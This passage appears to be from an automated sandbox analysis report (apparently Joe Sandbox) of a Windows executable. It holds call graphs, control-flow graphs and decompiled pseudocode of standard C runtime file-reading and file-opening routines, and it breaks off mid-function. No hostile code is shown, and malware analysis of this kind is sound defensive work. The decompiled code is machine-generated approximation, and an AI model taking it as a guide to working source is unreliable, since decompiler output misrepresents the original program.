8747->8748 8749 404d7f 8748->8749 8750 40506e __wsopen_s 25 API calls 8749->8750 8751 404d89 8750->8751 8751->8570 8752->8751 8753 40514f __dosmaperr 14 API calls 8752->8753 8753->8749 8755 404080 8754->8755 8756 4040b4 8754->8756 8755->8576 8757 4040cb 8756->8757 8758 406fe2 _free 14 API calls 8756->8758 8759 406fe2 _free 14 API calls 8757->8759 8758->8756 8759->8755 8769 402d85 8760->8769 8763 403430 8820 4031ee 8763->8820 8859 403056 8766->8859 8771 402d91 ___scrt_is_nonwritable_in_current_image 8769->8771 8770 402d98 8772 40514f __dosmaperr 14 API calls 8770->8772 8771->8770 8773 402db8 8771->8773 8774 402d9d 8772->8774 8775 402dca 8773->8775 8776 402dbd 8773->8776 8777 40506e __wsopen_s 25 API calls 8774->8777 8786 405888 8775->8786 8778 40514f __dosmaperr 14 API calls 8776->8778 8780 401043 8777->8780 8778->8780 8780->8763 8782 402de7 8794 402e25 8782->8794 8783 402dda 8784 40514f __dosmaperr 14 API calls 8783->8784 8784->8780 8787 405894 ___scrt_is_nonwritable_in_current_image 8786->8787 8798 408759 EnterCriticalSection 8787->8798 8789 4058a2 8799 40592c 8789->8799 8795 402e29 8794->8795 8819 405874 LeaveCriticalSection 8795->8819 8797 402e3a 8797->8780 8798->8789 8800 40594f 8799->8800 8801 4059a7 8800->8801 8808 4058af 8800->8808 8815 405860 EnterCriticalSection 8800->8815 8816 405874 LeaveCriticalSection 8800->8816 8802 406f85 __dosmaperr 14 API calls 8801->8802 8803 4059b0 8802->8803 8805 406fe2 _free 14 API calls 8803->8805 8806 4059b9 8805->8806 8807 409718 __wsopen_s 6 API calls 8806->8807 8806->8808 8809 4059d8 8807->8809 8812 4058e8 8808->8812 8817 405860 EnterCriticalSection 8809->8817 8818 4087a1 LeaveCriticalSection 8812->8818 8814 402dd3 8814->8782 8814->8783 8815->8800 8816->8800 8817->8808 8818->8814 8819->8797 8824 4031fa ___scrt_is_nonwritable_in_current_image 8820->8824 8821 403200 8822 40514f __dosmaperr 14 API calls 8821->8822 8825 403205 8822->8825 8823 403226 8833 405860 EnterCriticalSection 8823->8833 8824->8821 8824->8823 8827 40506e __wsopen_s 25 API calls 8825->8827 8829 403210 8827->8829 8828 403232 8834 403352 8828->8834 8829->8374 8831 403246 8845 40326f 8831->8845 8833->8828 8835 403375 8834->8835 8836 403365 8834->8836 8848 403279 8835->8848 8838 40514f __dosmaperr 14 API calls 8836->8838 8839 40336a 8838->8839 8839->8831 8840 403398 8844 40341b 8840->8844 8852 406cd9 8840->8852 8843 406ae1 __fread_nolock 27 API calls 8843->8844 8844->8831 8858 405874 LeaveCriticalSection 8845->8858 8847 403277 8847->8829 8849 4032e2 8848->8849 8850 40328a 8848->8850 8849->8840 8850->8849 8851 406ae1 __fread_nolock 27 API calls 8850->8851 8851->8849 8853 406cf1 8852->8853 8854 4033bf 8852->8854 8853->8854 8855 405dba __fread_nolock 25 API calls 8853->8855 8854->8843 8856 406d0f 8855->8856 8857 40b800 __wsopen_s 62 API calls 8856->8857 8857->8854 8858->8847 8861 403062 ___scrt_is_nonwritable_in_current_image 8859->8861 8860 4010a1 8861->8860 8862 403075 __fread_nolock 8861->8862 8863 4030ac 8861->8863 8866 40514f __dosmaperr 14 API calls 8862->8866 8872 405860 EnterCriticalSection 8863->8872 8865 4030b6 8873 402e53 8865->8873 8868 40308f 8866->8868 8870 40506e __wsopen_s 25 API calls 8868->8870 8870->8860 8872->8865 8874 402e80 8873->8874 8878 402e64 __fread_nolock 8873->8878 8886 4030eb 8874->8886 8875 402e70 8876 40514f __dosmaperr 14 API calls 8875->8876 8885 402e75 8876->8885 8877 402ec2 __fread_nolock 8877->8874 8880 402fe9 __fread_nolock 8877->8880 8881 405dba __fread_nolock 25 API calls 8877->8881 8882 4030f3 __fread_nolock 25 API calls 8877->8882 8884 4063f9 __fread_nolock 37 API calls 8877->8884 8878->8874 8878->8875 8878->8877 8879 40506e __wsopen_s 25 API calls 8879->8874 8883 40514f __dosmaperr 14 API calls 8880->8883 8881->8877 8882->8877 8883->8885 8884->8877 8885->8879 8889 405874 LeaveCriticalSection 8886->8889 8888 4030f1 8888->8860 8889->8888

                                                                                            Executed Functions

                                                                                            Function 00401982 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 371 401982-40198d SetUnhandledExceptionFilter
                                                                                            C-Code - Quality: 100%
                                                                                            			E00401982() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E0040198E); // executed
				return _t1;
			}




                                                                                            0x00401987
                                                                                            0x0040198d

                                                                                            APIs
                                                                                            • SetUnhandledExceptionFilter.KERNELBASE(Function_0000198E,0040131D), ref: 00401987
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.265136252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.265130355.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265150572.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265160870.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                            • String ID:
                                                                                            • API String ID: 3192549508-0
                                                                                            • Opcode ID: 4b0790ffa152826774b39451fd8d743ef10bc85848eca0e53a0a0948ad19004e
                                                                                            • Instruction ID: 0c1921fa704b6926ad7e0b433e43b35432b79a2b335370e8677e3054a6e40237
                                                                                            • Opcode Fuzzy Hash: 4b0790ffa152826774b39451fd8d743ef10bc85848eca0e53a0a0948ad19004e
                                                                                            • Instruction Fuzzy Hash:
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004063F9 Relevance: 13.8, APIs: 9, Instructions: 301COMMONLIBRARYCODE
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 0 4063f9-406409 1 406423-406425 0->1 2 40640b-40641e call 40513c call 40514f 0->2 4 40678a-406797 call 40513c call 40514f 1->4 5 40642b-406431 1->5 19 4067a2 2->19 24 40679d call 40506e 4->24 5->4 8 406437-40645d 5->8 8->4 11 406463-40646c 8->11 12 406486-406488 11->12 13 40646e-406481 call 40513c call 40514f 11->13 17 406786-406788 12->17 18 40648e-406491 12->18 13->24 22 4067a5-4067a8 17->22 18->17 23 406497-40649b 18->23 19->22 23->13 27 40649d-4064b4 23->27 24->19 29 406505-40650b 27->29 30 4064b6-4064b9 27->30 31 4064d1-4064e8 call 40513c call 40514f call 40506e 29->31 32 40650d-406517 29->32 33 4064c9-4064cf 30->33 34 4064bb-4064c4 30->34 64 4066bd 31->64 35 406519-40651b 32->35 36 40651e-40653c call 408ea0 call 406fe2 * 2 32->36 33->31 38 4064ed-406500 33->38 37 406589-406599 34->37 35->36 74 406559-406582 call 406ae1 36->74 75 40653e-406554 call 40514f call 40513c 36->75 40 40665e-406667 call 40aeb9 37->40 41 40659f-4065ab 37->41 38->37 53 406669-40667b 40->53 54 4066da 40->54 41->40 45 4065b1-4065b3 41->45 45->40 50 4065b9-4065dd 45->50 50->40 55 4065df-4065f5 50->55 53->54 59 40667d-40668c GetConsoleMode 53->59 57 4066de-4066f6 ReadFile 54->57 55->40 60 4065f7-4065f9 55->60 62 406752-40675d GetLastError 57->62 63 4066f8-4066fe 57->63 59->54 65 40668e-406692 59->65 60->40 66 4065fb-406621 60->66 68 406776-406779 62->68 69 40675f-406771 call 40514f call 40513c 62->69 63->62 70 406700 63->70 72 4066c0-4066ca call 406fe2 64->72 65->57 71 406694-4066ae ReadConsoleW 65->71 66->40 73 406623-406639 66->73 81 4066b6-4066bc call 405119 68->81 82 40677f-406781 68->82 69->64 77 406703-406715 70->77 79 4066b0 GetLastError 71->79 80 4066cf-4066d8 71->80 72->22 73->40 84 40663b-40663d 73->84 74->37 75->64 77->72 88 406717-40671b 77->88 79->81 80->77 81->64 82->72 84->40 92 40663f-406659 84->92 95 406734-40673f 88->95 96 40671d-40672d call 406113 88->96 92->40 101 406741 call 40626a 95->101 102 40674b-406750 call 405f42 95->102 107 406730-406732 96->107 108 406746-406749 101->108 102->108 107->72 108->107
                                                                                            C-Code - Quality: 82%
                                                                                            			E004063F9(signed int _a4, void* _a8, unsigned int _a12) {
				char _v5;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _v24;
				void* _v28;
				long _v32;
				char _v36;
				void* _v40;
				long _v44;
				signed int* _t137;
				signed int _t139;
				intOrPtr _t143;
				unsigned int _t154;
				intOrPtr _t158;
				signed int _t160;
				signed int _t163;
				long _t164;
				intOrPtr _t169;
				signed int _t170;
				intOrPtr _t172;
				signed int _t174;
				signed int _t178;
				void _t180;
				char _t185;
				char _t190;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				signed int _t207;
				long _t210;
				unsigned int _t212;
				intOrPtr _t214;
				unsigned int _t217;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				signed int _t222;
				signed char _t224;
				char _t226;
				signed int _t228;
				void* _t229;
				signed int _t230;
				char* _t231;
				char* _t232;
				signed int _t235;
				signed int _t236;
				void* _t240;
				void* _t242;
				void* _t243;

				_t198 = _a4;
				_t246 = _t198 - 0xfffffffe;
				if(_t198 != 0xfffffffe) {
					__eflags = _t198;
					if(__eflags < 0) {
						L59:
						_t137 = E0040513C(__eflags);
						 *_t137 =  *_t137 & 0x00000000;
						__eflags =  *_t137;
						 *((intOrPtr*)(E0040514F( *_t137))) = 9;
						L60:
						_t139 = E0040506E();
						goto L61;
					}
					__eflags = _t198 -  *0x4180d8; // 0x40
					if(__eflags >= 0) {
						goto L59;
					}
					_t207 = _t198 >> 6;
					_t235 = (_t198 & 0x0000003f) * 0x38;
					_v12 = _t207;
					_t143 =  *((intOrPtr*)(0x417ed8 + _t207 * 4));
					_v20 = _t235;
					_v36 = 1;
					_t224 =  *((intOrPtr*)(_t143 + _t235 + 0x28));
					__eflags = 1 & _t224;
					if(__eflags == 0) {
						goto L59;
					}
					_t210 = _a12;
					__eflags = _t210 - 0x7fffffff;
					if(__eflags <= 0) {
						__eflags = _t210;
						if(_t210 == 0) {
							L58:
							return 0;
						}
						__eflags = _t224 & 0x00000002;
						if((_t224 & 0x00000002) != 0) {
							goto L58;
						}
						__eflags = _a8;
						if(__eflags == 0) {
							goto L6;
						}
						_v28 =  *((intOrPtr*)(_t143 + _t235 + 0x18));
						_t226 =  *((intOrPtr*)(_t143 + _t235 + 0x29));
						_v5 = _t226;
						_t240 = 0;
						_t228 = _t226 - 1;
						__eflags = _t228;
						if(_t228 == 0) {
							__eflags =  !_t210 & 0x00000001;
							if(__eflags == 0) {
								L14:
								 *(E0040513C(__eflags)) =  *_t149 & _t240;
								 *((intOrPtr*)(E0040514F(__eflags))) = 0x16;
								E0040506E();
								goto L39;
							} else {
								_t154 = 4;
								_t212 = _t210 >> 1;
								_v16 = _t154;
								__eflags = _t212 - _t154;
								if(_t212 >= _t154) {
									_t154 = _t212;
									_v16 = _t212;
								}
								_t240 = E00408EA0(_t154);
								E00406FE2(0);
								E00406FE2(0);
								_t243 = _t242 + 0xc;
								_v24 = _t240;
								__eflags = _t240;
								if(__eflags != 0) {
									_t158 = E00406AE1(_t198, 0, 0, 1);
									_t242 = _t243 + 0x10;
									_t214 =  *((intOrPtr*)(0x417ed8 + _v12 * 4));
									 *((intOrPtr*)(_t235 + _t214 + 0x20)) = _t158;
									 *(_t235 + _t214 + 0x24) = _t228;
									_t229 = _t240;
									_t210 = _v16;
									_t143 =  *((intOrPtr*)(0x417ed8 + _v12 * 4));
									L22:
									_t199 = _v20;
									_t235 = 0;
									_v40 = _t229;
									__eflags =  *(_t199 + _t143 + 0x28) & 0x00000048;
									_t200 = _a4;
									if(( *(_t199 + _t143 + 0x28) & 0x00000048) != 0) {
										_t180 =  *((intOrPtr*)(_v20 + _t143 + 0x2a));
										_t200 = _a4;
										__eflags = _t180 - 0xa;
										if(_t180 != 0xa) {
											__eflags = _t210;
											if(_t210 != 0) {
												_t235 = 1;
												 *_t229 = _t180;
												_t231 = _t229 + 1;
												_t220 = _t210 - 1;
												__eflags = _v5;
												_v24 = _t231;
												_v16 = _t220;
												 *((char*)(_v20 +  *((intOrPtr*)(0x417ed8 + _v12 * 4)) + 0x2a)) = 0xa;
												_t200 = _a4;
												if(_v5 != 0) {
													_t185 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0x417ed8 + _v12 * 4)) + 0x2b));
													_t200 = _a4;
													__eflags = _t185 - 0xa;
													if(_t185 != 0xa) {
														__eflags = _t220;
														if(_t220 != 0) {
															 *_t231 = _t185;
															_t232 = _t231 + 1;
															_t221 = _t220 - 1;
															__eflags = _v5 - 1;
															_v24 = _t232;
															_t235 = 2;
															_v16 = _t221;
															 *((char*)(_v20 +  *((intOrPtr*)(0x417ed8 + _v12 * 4)) + 0x2b)) = 0xa;
															_t200 = _a4;
															if(_v5 == 1) {
																_t190 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0x417ed8 + _v12 * 4)) + 0x2c));
																_t200 = _a4;
																__eflags = _t190 - 0xa;
																if(_t190 != 0xa) {
																	__eflags = _t221;
																	if(_t221 != 0) {
																		 *_t232 = _t190;
																		_t222 = _t221 - 1;
																		__eflags = _t222;
																		_v16 = _t222;
																		_v24 = _t232 + 1;
																		_t235 = 3;
																		 *((char*)(_v20 +  *((intOrPtr*)(0x417ed8 + _v12 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t160 = E0040AEB9(_t200);
									__eflags = _t160;
									if(_t160 == 0) {
										L42:
										_v36 = 0;
										L43:
										_t163 = ReadFile(_v28, _v24, _v16,  &_v32, 0); // executed
										__eflags = _t163;
										if(_t163 == 0) {
											L54:
											_t164 = GetLastError();
											_t235 = 5;
											__eflags = _t164 - _t235;
											if(__eflags != 0) {
												__eflags = _t164 - 0x6d;
												if(_t164 != 0x6d) {
													L38:
													E00405119(_t164);
													goto L39;
												}
												_t236 = 0;
												goto L40;
											}
											 *((intOrPtr*)(E0040514F(__eflags))) = 9;
											 *(E0040513C(__eflags)) = _t235;
											goto L39;
										}
										_t217 = _a12;
										__eflags = _v32 - _t217;
										if(_v32 > _t217) {
											goto L54;
										}
										_t236 = _t235 + _v32;
										__eflags = _t236;
										L46:
										_t230 = _v20;
										_t169 =  *((intOrPtr*)(0x417ed8 + _v12 * 4));
										__eflags =  *((char*)(_t230 + _t169 + 0x28));
										if( *((char*)(_t230 + _t169 + 0x28)) < 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v36;
												_push(_t236 >> 1);
												_push(_v40);
												_push(_t200);
												if(_v36 == 0) {
													_t170 = E00405F42();
												} else {
													_t170 = E0040626A();
												}
											} else {
												_t218 = _t217 >> 1;
												__eflags = _t217 >> 1;
												_t170 = E00406113(_t217 >> 1, _t217 >> 1, _t200, _v24, _t236, _a8, _t218);
											}
											_t236 = _t170;
										}
										goto L40;
									}
									_t219 = _v20;
									_t172 =  *((intOrPtr*)(0x417ed8 + _v12 * 4));
									__eflags =  *((char*)(_t219 + _t172 + 0x28));
									if( *((char*)(_t219 + _t172 + 0x28)) >= 0) {
										goto L42;
									}
									_t174 = GetConsoleMode(_v28,  &_v44);
									__eflags = _t174;
									if(_t174 == 0) {
										goto L42;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L43;
									}
									_t178 = ReadConsoleW(_v28, _v24, _v16 >> 1,  &_v32, 0);
									__eflags = _t178;
									if(_t178 != 0) {
										_t217 = _a12;
										_t236 = _t235 + _v32 * 2;
										goto L46;
									}
									_t164 = GetLastError();
									goto L38;
								} else {
									 *((intOrPtr*)(E0040514F(__eflags))) = 0xc;
									 *(E0040513C(__eflags)) = 8;
									L39:
									_t236 = _t235 | 0xffffffff;
									__eflags = _t236;
									L40:
									E00406FE2(_t240);
									return _t236;
								}
							}
						}
						__eflags = _t228 == 1;
						if(_t228 == 1) {
							__eflags =  !_t210 & 0x00000001;
							if(__eflags != 0) {
								_t229 = _a8;
								_v16 = _t210;
								_v24 = _t229;
								_t143 =  *((intOrPtr*)(0x417ed8 + _v12 * 4));
								goto L22;
							}
							goto L14;
						} else {
							_t229 = _a8;
							_v16 = _t210;
							_v24 = _t229;
							goto L22;
						}
					}
					L6:
					 *(E0040513C(__eflags)) =  *_t145 & 0x00000000;
					 *((intOrPtr*)(E0040514F(__eflags))) = 0x16;
					goto L60;
				} else {
					 *(E0040513C(_t246)) =  *_t197 & 0x00000000;
					_t139 = E0040514F(_t246);
					 *_t139 = 9;
					L61:
					return _t139 | 0xffffffff;
				}
			}





















































                                                                                            0x00406402
                                                                                            0x00406406
                                                                                            0x00406409
                                                                                            0x00406423
                                                                                            0x00406425
                                                                                            0x0040678a
                                                                                            0x0040678a
                                                                                            0x0040678f
                                                                                            0x0040678f
                                                                                            0x00406797
                                                                                            0x0040679d
                                                                                            0x0040679d
                                                                                            0x00000000
                                                                                            0x0040679d
                                                                                            0x0040642b
                                                                                            0x00406431
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040643b
                                                                                            0x00406441
                                                                                            0x00406444
                                                                                            0x00406447
                                                                                            0x00406451
                                                                                            0x00406454
                                                                                            0x00406457
                                                                                            0x0040645b
                                                                                            0x0040645d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406463
                                                                                            0x00406466
                                                                                            0x0040646c
                                                                                            0x00406486
                                                                                            0x00406488
                                                                                            0x00406786
                                                                                            0x00000000
                                                                                            0x00406786
                                                                                            0x0040648e
                                                                                            0x00406491
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406497
                                                                                            0x0040649b
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004064a1
                                                                                            0x004064a4
                                                                                            0x004064a8
                                                                                            0x004064af
                                                                                            0x004064b1
                                                                                            0x004064b1
                                                                                            0x004064b4
                                                                                            0x00406509
                                                                                            0x0040650b
                                                                                            0x004064d1
                                                                                            0x004064d6
                                                                                            0x004064dd
                                                                                            0x004064e3
                                                                                            0x00000000
                                                                                            0x0040650d
                                                                                            0x0040650f
                                                                                            0x00406510
                                                                                            0x00406512
                                                                                            0x00406515
                                                                                            0x00406517
                                                                                            0x00406519
                                                                                            0x0040651b
                                                                                            0x0040651b
                                                                                            0x00406526
                                                                                            0x00406528
                                                                                            0x0040652f
                                                                                            0x00406534
                                                                                            0x00406537
                                                                                            0x0040653a
                                                                                            0x0040653c
                                                                                            0x00406560
                                                                                            0x00406568
                                                                                            0x0040656b
                                                                                            0x00406572
                                                                                            0x00406579
                                                                                            0x0040657d
                                                                                            0x0040657f
                                                                                            0x00406582
                                                                                            0x00406589
                                                                                            0x00406589
                                                                                            0x0040658c
                                                                                            0x0040658e
                                                                                            0x00406591
                                                                                            0x00406596
                                                                                            0x00406599
                                                                                            0x004065a2
                                                                                            0x004065a6
                                                                                            0x004065a9
                                                                                            0x004065ab
                                                                                            0x004065b1
                                                                                            0x004065b3
                                                                                            0x004065bc
                                                                                            0x004065bd
                                                                                            0x004065bf
                                                                                            0x004065c3
                                                                                            0x004065c4
                                                                                            0x004065c8
                                                                                            0x004065cb
                                                                                            0x004065d5
                                                                                            0x004065da
                                                                                            0x004065dd
                                                                                            0x004065ec
                                                                                            0x004065f0
                                                                                            0x004065f3
                                                                                            0x004065f5
                                                                                            0x004065f7
                                                                                            0x004065f9
                                                                                            0x004065fe
                                                                                            0x00406600
                                                                                            0x00406604
                                                                                            0x00406605
                                                                                            0x0040660b
                                                                                            0x00406615
                                                                                            0x00406616
                                                                                            0x00406619
                                                                                            0x0040661e
                                                                                            0x00406621
                                                                                            0x00406630
                                                                                            0x00406634
                                                                                            0x00406637
                                                                                            0x00406639
                                                                                            0x0040663b
                                                                                            0x0040663d
                                                                                            0x0040663f
                                                                                            0x00406645
                                                                                            0x00406645
                                                                                            0x00406646
                                                                                            0x00406655
                                                                                            0x00406658
                                                                                            0x00406659
                                                                                            0x00406659
                                                                                            0x0040663d
                                                                                            0x00406639
                                                                                            0x00406621
                                                                                            0x004065f9
                                                                                            0x004065f5
                                                                                            0x004065dd
                                                                                            0x004065b3
                                                                                            0x004065ab
                                                                                            0x0040665f
                                                                                            0x00406665
                                                                                            0x00406667
                                                                                            0x004066da
                                                                                            0x004066da
                                                                                            0x004066de
                                                                                            0x004066ee
                                                                                            0x004066f4
                                                                                            0x004066f6
                                                                                            0x00406752
                                                                                            0x00406752
                                                                                            0x0040675a
                                                                                            0x0040675b
                                                                                            0x0040675d
                                                                                            0x00406776
                                                                                            0x00406779
                                                                                            0x004066b6
                                                                                            0x004066b7
                                                                                            0x00000000
                                                                                            0x004066bc
                                                                                            0x0040677f
                                                                                            0x00000000
                                                                                            0x0040677f
                                                                                            0x00406764
                                                                                            0x0040676f
                                                                                            0x00000000
                                                                                            0x0040676f
                                                                                            0x004066f8
                                                                                            0x004066fb
                                                                                            0x004066fe
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406700
                                                                                            0x00406700
                                                                                            0x00406703
                                                                                            0x00406706
                                                                                            0x00406709
                                                                                            0x00406710
                                                                                            0x00406715
                                                                                            0x00406717
                                                                                            0x0040671b
                                                                                            0x00406736
                                                                                            0x0040673a
                                                                                            0x0040673b
                                                                                            0x0040673e
                                                                                            0x0040673f
                                                                                            0x0040674b
                                                                                            0x00406741
                                                                                            0x00406741
                                                                                            0x00406741
                                                                                            0x0040671d
                                                                                            0x0040671d
                                                                                            0x0040671d
                                                                                            0x00406728
                                                                                            0x0040672d
                                                                                            0x00406730
                                                                                            0x00406730
                                                                                            0x00000000
                                                                                            0x00406715
                                                                                            0x0040666c
                                                                                            0x0040666f
                                                                                            0x00406676
                                                                                            0x0040667b
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406684
                                                                                            0x0040668a
                                                                                            0x0040668c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040668e
                                                                                            0x00406692
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004066a6
                                                                                            0x004066ac
                                                                                            0x004066ae
                                                                                            0x004066d2
                                                                                            0x004066d5
                                                                                            0x00000000
                                                                                            0x004066d5
                                                                                            0x004066b0
                                                                                            0x00000000
                                                                                            0x0040653e
                                                                                            0x00406543
                                                                                            0x0040654e
                                                                                            0x004066bd
                                                                                            0x004066bd
                                                                                            0x004066bd
                                                                                            0x004066c0
                                                                                            0x004066c1
                                                                                            0x00000000
                                                                                            0x004066c9
                                                                                            0x0040653c
                                                                                            0x0040650b
                                                                                            0x004064b6
                                                                                            0x004064b9
                                                                                            0x004064cd
                                                                                            0x004064cf
                                                                                            0x004064f0
                                                                                            0x004064f3
                                                                                            0x004064f6
                                                                                            0x004064f9
                                                                                            0x00000000
                                                                                            0x004064f9
                                                                                            0x00000000
                                                                                            0x004064bb
                                                                                            0x004064bb
                                                                                            0x004064be
                                                                                            0x004064c1
                                                                                            0x00000000
                                                                                            0x004064c1
                                                                                            0x004064b9
                                                                                            0x0040646e
                                                                                            0x00406473
                                                                                            0x0040647b
                                                                                            0x00000000
                                                                                            0x0040640b
                                                                                            0x00406410
                                                                                            0x00406413
                                                                                            0x00406418
                                                                                            0x004067a2
                                                                                            0x00000000
                                                                                            0x004067a2

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.265136252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.265130355.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265150572.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265160870.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 923df528c6d88b757811353189d6395c903ea2f02d975a2a3e7e1098b1f0e0d5
                                                                                            • Instruction ID: ac0e22d5144a2580b17d2d769023b0afd5741aa9f05ee766bdeb9c2b9c041b3c
                                                                                            • Opcode Fuzzy Hash: 923df528c6d88b757811353189d6395c903ea2f02d975a2a3e7e1098b1f0e0d5
                                                                                            • Instruction Fuzzy Hash: 4EC1E170E04205AFDB11DF99D881BAE7BB1AF49304F05807AE406BB3D2C7799D528F69
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0040AB8F Relevance: 13.8, APIs: 9, Instructions: 273COMMONLIBRARYCODE
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 109 40ab8f-40abbf call 40a8dd 112 40abc1-40abcc call 40513c 109->112 113 40abda-40abe6 call 408a0f 109->113 118 40abce-40abd5 call 40514f 112->118 119 40abe8-40abfd call 40513c call 40514f 113->119 120 40abff-40ac48 call 40a848 113->120 129 40aeb4-40aeb8 118->129 119->118 127 40acb5-40acbe GetFileType 120->127 128 40ac4a-40ac53 120->128 133 40acc0-40acf1 GetLastError call 405119 CloseHandle 127->133 134 40ad07-40ad0a 127->134 131 40ac55-40ac59 128->131 132 40ac8a-40acb0 GetLastError call 405119 128->132 131->132 138 40ac5b-40ac88 call 40a848 131->138 132->118 133->118 148 40acf7-40ad02 call 40514f 133->148 136 40ad13-40ad19 134->136 137 40ad0c-40ad11 134->137 141 40ad1d-40ad6b call 40895a 136->141 142 40ad1b 136->142 137->141 138->127 138->132 151 40ad8a-40adb2 call 40a5f5 141->151 152 40ad6d-40ad79 call 40aa57 141->152 142->141 148->118 158 40adb4-40adb5 151->158 159 40adb7-40adf8 151->159 152->151 160 40ad7b 152->160 161 40ad7d-40ad85 call 40cd17 158->161 162 40ae19-40ae27 159->162 163 40adfa-40adfe 159->163 160->161 161->129 165 40aeb2 162->165 166 40ae2d-40ae31 162->166 163->162 164 40ae00-40ae14 163->164 164->162 165->129 166->165 168 40ae33-40ae66 CloseHandle call 40a848 166->168 172 40ae68-40ae94 GetLastError call 405119 call 408b22 168->172 173 40ae9a-40aeae 168->173 172->173 173->165
                                                                                            C-Code - Quality: 43%
                                                                                            			E0040AB8F(void* __ecx, void* __eflags, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v5;
				char _v6;
				void* _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v36;
				signed int _v44;
				void _v48;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t114;
				void* _t122;
				signed int _t123;
				signed char _t124;
				signed int _t134;
				intOrPtr _t162;
				intOrPtr _t178;
				signed int* _t186;
				void* _t188;
				signed int* _t189;
				signed int _t191;
				char _t196;
				signed int _t202;
				signed int _t205;
				signed int _t214;
				signed int _t216;
				signed int _t218;
				signed int _t224;
				signed int _t226;
				signed int _t233;
				signed int _t234;
				signed int _t236;
				signed int _t238;
				signed char _t241;
				signed int _t242;
				intOrPtr _t246;
				void* _t249;
				void* _t253;
				void* _t263;
				signed int _t264;
				signed int _t267;
				signed int _t268;
				signed int _t271;
				void* _t273;
				void* _t275;
				void* _t276;
				void* _t278;
				void* _t279;
				void* _t281;
				void* _t285;
				signed int _t289;

				_t263 = E0040A8DD(__ecx,  &_v72, _a16, _a20, _a24);
				_t191 = 6;
				memcpy( &_v48, _t263, _t191 << 2);
				_t275 = _t273 + 0x1c;
				_t249 = _t263 + _t191 + _t191;
				_t264 = _t263 | 0xffffffff;
				_t288 = _v36 - _t264;
				if(_v36 != _t264) {
					_t114 = E00408A0F(_t188, _t249, _t264, __eflags);
					_t189 = _a8;
					 *_t189 = _t114;
					__eflags = _t114 - _t264;
					if(__eflags != 0) {
						_v20 = _v20 & 0x00000000;
						_v24 = 0xc;
						_t276 = _t275 - 0x18;
						 *_a4 = 1;
						_push(6);
						_v16 =  !(_a16 >> 7) & 1;
						_push( &_v24);
						_push(_a12);
						memcpy(_t276,  &_v48, 1 << 2);
						_t196 = 0;
						_t122 = E0040A848(); // executed
						_t253 = _t122;
						_t278 = _t276 + 0x2c;
						_v12 = _t253;
						__eflags = _t253 - 0xffffffff;
						if(_t253 != 0xffffffff) {
							L11:
							_t123 = GetFileType(_t253); // executed
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t123 - 2;
								if(_t123 != 2) {
									__eflags = _t123 - 3;
									_t124 = _v48;
									if(_t123 == 3) {
										_t124 = _t124 | 0x00000008;
										__eflags = _t124;
									}
								} else {
									_t124 = _v48 | 0x00000040;
								}
								_v5 = _t124;
								E0040895A(_t196, _t253,  *_t189, _t253);
								_t241 = _v5 | 0x00000001;
								_v5 = _t241;
								_v48 = _t241;
								 *( *((intOrPtr*)(0x417ed8 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) = _t241;
								_t202 =  *_t189;
								_t204 = (_t202 & 0x0000003f) * 0x38;
								__eflags = _a16 & 0x00000002;
								 *((char*)( *((intOrPtr*)(0x417ed8 + (_t202 >> 6) * 4)) + 0x29 + (_t202 & 0x0000003f) * 0x38)) = 0;
